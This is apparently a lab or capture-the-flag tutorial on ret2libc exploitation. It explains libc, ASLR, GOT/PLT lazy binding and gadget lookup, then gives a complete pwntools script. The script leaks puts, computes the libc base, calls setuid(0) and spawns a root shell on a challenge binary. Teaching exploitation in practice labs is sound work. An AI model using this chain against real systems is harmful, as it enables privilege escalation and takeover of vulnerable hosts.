What is libc?
libc is the standard C library in Linux. It provides core functions like:
printf
(to print formatted text),puts
(to print strings),system
(to run system commands like /bin/sh),malloc
(to allocate memory),free
(to deallocate memory),read
(to read from file descriptors),write
(to write to file descriptors),execve
(to execute programs),fork
(to create new processes),open
(to open files),close
(to close file descriptors), ...and many others.
In short, libc is the toolbox that almost every program uses to get basic tasks done.
Why Do We Need to Leak libc?
In Return Oriented Programming (ROP), you are trying to hijack the control flow of a program to achieve your goals,
like spawning a shell. However, most binaries do not include direct access to functions like system("/bin/sh")
. Instead:
- The function
system
exists inside libc, not in the program itself. - To call
system
, you need its address in memory.
This toolbox is shared across programs to save space and increase efficiency. Instead of bundling these tools with every program, they are stored in a centralized library file called libc (short for the C Standard Library). On Linux, libc is stored as a shared object (e.g., /lib/x86_64-linux-gnu/libc.so.6).
Here’s where things get tricky:
- Modern systems use ASLR (Address Space Layout Randomization), which randomizes the memory addresses of loaded libraries, including libc.
- This means the address of libc changes every time the program runs.
- So you can’t hardcode the address of
system
or/bin/sh
in your exploit.
Solution: Calculate libc base address
Leak the address of a function (like puts
) inside libc. Then use that leak to calculate the base address of libc.
Once you know the base address, you can calculate the address of any function in libc, such as system
.
libc Leak
You leak the address of a function in libc (like puts or printf) that is already being used by the program. Here’s how this works:
The GOT (Global Offset Table):
- The program contains a table (GOT) that holds the runtime addresses of functions in libc.
- When a program first starts, the GOT entries are initially empty/unresolved.
- Once a function is called for the first time, its actual address is resolved and stored in the GOT.
- All subsequent calls to that function will use the stored address directly.
The PLT (Procedure Linkage Table):
- The PLT is a series of small code stubs that handle the dynamic linking process.
- When a libc function is called for the first time:
- The call goes to the PLT entry
- The PLT checks if the GOT entry is resolved
- If unresolved, the dynamic linker is called to find the actual address
- The address is stored in the GOT for future use
- This process is called "lazy binding" because addresses are only resolved when needed.
The Leak:
- By calling
puts
and passing the address ofputs@got
, the program will print the actual runtime address ofputs
in libc.puts_address = u64(io.recvline()[:-1].ljust(8, b'\x00'))
- Once you get this address, you can subtract the known offset of
puts
in libc to calculate the base address of libc. Be aware that the libc address must end with 000libc_base = puts_address - puts_offset
Why is the Base Address Important?
With the base address, you can calculate the addresses of other useful functions like system
, execve
, setuid
, or gadgets.
You can find this libc with ldd <program>
System
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
1430: 0000000000052290 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5
The offset of system
is 0x52290
.
- For example for getting the address of
system
:
system_address = libc_base + 0x52290
Setuid
- For getting the address of
setuid
:
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep setuid
25: 00000000000e4150 152 FUNC WEAK DEFAULT 15 setuid@@GLIBC_2.2.5
The offset of setuid
is 0xe4150
.
setuid_address = libc_base + 0xe4150
Binsh
- For getting the address of
/bin/sh
:
$ strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
1b45bd /bin/sh
The offset of /bin/sh
is 0x1b45bd
.
binsh_address = libc_base + 0x1b45bd
Actual Libc Leak in 4 steps
Step 1: POP RDI
- POP_RDI (Gadget)
The pop rdi; ret gadget is required to load the address of puts@got into the rdi register, which is the first argument for the puts function.
$ ropper -f binary | grep rdi
Example output:
0x0000000000402043: pop rdi; ret;
POP_RDI = p64(0x402043)
Step 2: puts@got (Global Offset Table entry)
The puts@got entry holds the runtime address of the puts function in libc. This is what you leak to calculate the base address of libc.
$ readelf -r binary | grep puts
000000405020 000200000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
puts_got = p64(0x405020) #p64(elf.got['puts'])
Step 3: puts@plt (Procedure Linkage Table entry)
The PLT entry for puts acts like a stub that forwards the call to the actual function. This is where you want to call puts with puts@got as the argument.
Find the PLT entry for puts:
$ objdump -d binary | grep plt
401f18: e8 73 f1 ff ff call 401090 <puts@plt>
puts_plt = p64(0x401090) #p64(elf.plt['puts'])
Step 4: Return Address (Entry Point or Main)
After leaking the libc address, you want the program to restart so you can send the next stage of your ROP chain.
return_address = p64(0x401ed5) #p64(elf.symbols['challenge'])
Explanation:
pop rdi; ret
: Sets up rdi to point to puts@got.puts@plt
: Calls the puts function, which will print the address stored in puts@got.main or entry point
: Restarts the program so you can send your second stage payload.
What now?
Get the puts symbol from libc
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
- Send this payload to the program.
- Capture the output, which will print the runtime address of puts in libc.
io.sendline(payload)
leak = u64(io.recvline()[:-1].ljust(8, b'\x00'))
The offset of puts is constant in a specific libc version. When you leak the runtime address of puts (e.g., puts@got), you can calculate the base address of libc:
libc.address = leak - 0x84420 #libc.symbols['puts']
Calculate the addresses of system, setuid, and binsh
From there, you can calculate the addresses of other symbols like system, setuid and /bin/sh:
BINSH = libc.address + 0x1b45bd #next(libc.search(b"/bin/sh"))
SYSTEM = libc.address + 0x52290 #libc.sym["system"]
SETUID = libc.address + 0xe4150 #libc.sym["setuid"]
After that we can execute the ROPchain to spawn a root shell as shown in the full automatic exploit example.
Fully automatic ROPchain with libc leak to spawn a root shell
from pwn import *
exe = "/challenge/babyrop_level8.1"
elf = context.binary = ELF(exe, checksec=True)
context.clear(arch="amd64")
context.log_level = "info"
context.terminal = ["tmux", "splitw", "-h"]
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)
gdbscript = """
"""
io = start()
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
POP_RDI = 0x402043
RET = 0x40101a
payload = b'A' * 136
##### LEAK GOT #####
payload += p64(POP_RDI)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(elf.symbols['challenge'])
io.sendline(payload)
##### PARSE OUTPUT #####
io.recvuntil(b'Leaving!\n')
leak = u64(io.recvline()[:-1].ljust(8, b'\x00'))
log.success("Leak %#x", leak)
libc.address = leak - libc.symbols['puts']
BINSH = next(libc.search(b"/bin/sh"))
SYSTEM = libc.sym["system"]
SETUID = libc.sym["setuid"]
log.success(f"libc base @ {hex(libc.address)}")
log.info(f"/bin/sh @ {hex(BINSH)}")
log.info(f"system @ {hex(SYSTEM)}")
log.info(f"setuid @ {hex(SETUID)}")
##### SECOND PAYLOAD #####
## SETUID ##
payload2 = b'A' * 136
payload2 += p64(POP_RDI)
payload2 += p64(0x0) # Root
payload2 += p64(SETUID)
## /bin/sh ##
payload2 += p64(POP_RDI)
payload2 += p64(BINSH)
payload2 += p64(SYSTEM)
io.sendline(payload2)
io.interactive()